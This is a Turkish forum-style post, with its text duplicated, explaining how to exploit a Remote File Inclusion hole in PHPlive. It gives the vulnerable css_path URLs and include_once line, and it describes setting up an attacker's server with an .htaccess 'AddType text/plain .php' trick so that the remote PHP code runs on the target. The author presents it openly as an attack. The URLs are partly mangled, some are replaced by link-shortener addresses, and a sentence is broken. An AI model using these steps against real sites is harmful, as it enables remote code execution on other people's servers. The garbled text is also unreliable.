Açık Remote File Inclusion’dur. Kaynak dosyalar
help.php?css_path=htt://www.si tenic.com/
setup/header.php?css_path=htt:// www.siteniz.com/
Peki nedir bu Remote File Inclusion?
Remote File Inclusion, php’deki include() fonksiyonun bir açığıdır. Eğer include fonksiyonunu URL’nizden gelen bir değişken ile kullanıyorsanız başka sitelerden dosya include edilmesini kapatmalısınız.
PHPlive’daki açık,
include_once( $css_path."css/default.php" )
Yani $css_patch yerine [URL="https://tik.lat/mjIbY"] http://www.siteniz.com [url]https://tik.lat/FI66I ault.php dosyasını include edecektir ve içindeki kodları çalıştıracaktır.
Peki .php dosyası içindeki kodlar server tarafından derlenip gösteriliyor bu nedenle client side yani başka sunucu üzerindeki atak yaptığım PHPlive kodları göremiyor? Ne yapacaz?
Apache sunucularda .htaccess ile hangi dosyaya nasıl davranılacağını söyleyebiliriz. css klasorune bir htaccess.txt dosyası upload edin içinde "AddType text/plain .php" yazsın tırnaklar olmadan. Upload ettikten sonra ftp’den ismini .htaccess olarak değiştirin. (windows. htaccess dosyalara izin vermez. ama komut satırından ren komutu ile dosya ismini değiştirebilirsiniz)
Ve artık php dosyalarımız text dosyası olarak gözüküyor. Rahat rahat kodlarımızı çalıştırabiliriz
www.php.net
help.php?css_path=htt://www.si tenic.com/
setup/header.php?css_path=htt:// www.siteniz.com/
Peki nedir bu Remote File Inclusion?
Remote File Inclusion, php’deki include() fonksiyonun bir açığıdır. Eğer include fonksiyonunu URL’nizden gelen bir değişken ile kullanıyorsanız başka sitelerden dosya include edilmesini kapatmalısınız.
PHPlive’daki açık,
include_once( $css_path."css/default.php" )
Yani $css_patch yerine [URL="https://tik.lat/mjIbY"] http://www.siteniz.com [url]https://tik.lat/FI66I ault.php dosyasını include edecektir ve içindeki kodları çalıştıracaktır.
Peki .php dosyası içindeki kodlar server tarafından derlenip gösteriliyor bu nedenle client side yani başka sunucu üzerindeki atak yaptığım PHPlive kodları göremiyor? Ne yapacaz?
Apache sunucularda .htaccess ile hangi dosyaya nasıl davranılacağını söyleyebiliriz. css klasorune bir htaccess.txt dosyası upload edin içinde "AddType text/plain .php" yazsın tırnaklar olmadan. Upload ettikten sonra ftp’den ismini .htaccess olarak değiştirin. (windows. htaccess dosyalara izin vermez. ama komut satırından ren komutu ile dosya ismini değiştirebilirsiniz)
Ve artık php dosyalarımız text dosyası olarak gözüküyor. Rahat rahat kodlarımızı çalıştırabiliriz
www.php.net